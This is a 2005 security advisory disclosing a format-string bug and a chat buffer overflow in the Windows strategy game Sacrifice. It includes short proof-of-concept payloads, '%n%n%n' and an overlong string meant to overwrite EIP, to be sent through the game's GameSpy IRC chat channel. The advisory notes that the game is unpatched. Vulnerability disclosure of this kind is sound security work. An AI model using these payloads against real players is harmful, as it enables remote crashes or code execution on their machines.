####################################################################### Luigi Auriemma Application: Sacrifice Versions: <= Patch #3 Platforms: Windows Bugs: A] format string everywhere B] buffer-overflow in chat Exploitation: remote, versus users (broadcast) Date: 01 Aug 2005 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== Sacrifice is a strategy game developed by Shiny Entertainment (http://www.shiny.com) and published by Interplay (http://www.interplay.com) in the far 2000. ####################################################################### ======= 2) Bugs ======= --------------------------- A] format string everywhere --------------------------- The game uses a function in game3d.dll for building the visualized text strings on the screen. This is a graphic function and so is used for ANY text, menu, chat, message, name, server... everything, and is affected by a format string caused by the wrong usage of vsprintf(). -------------------------- B] buffer-overflow in chat -------------------------- Exists a buffer-overflow exploitable when the game receives a message from the online chat (peerchat.gamespy.com). This bug is caused by the arbitrary copy of the chars of the message until are lower/equal than 0x20 (function GetWord() in share.dll) into a buffer of only 256 bytes. ####################################################################### =========== 3) The Code =========== The most easy way for exploiting these bugs is through the usage of a normal IRC client for entering in the channel #GSP!sacrifice on the server peerchat.gamespy.com and then sending the following messages: A] %n%n%n B] aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaEIPX ####################################################################### ====== 4) Fix ====== The game is no longer supported. #######################################################################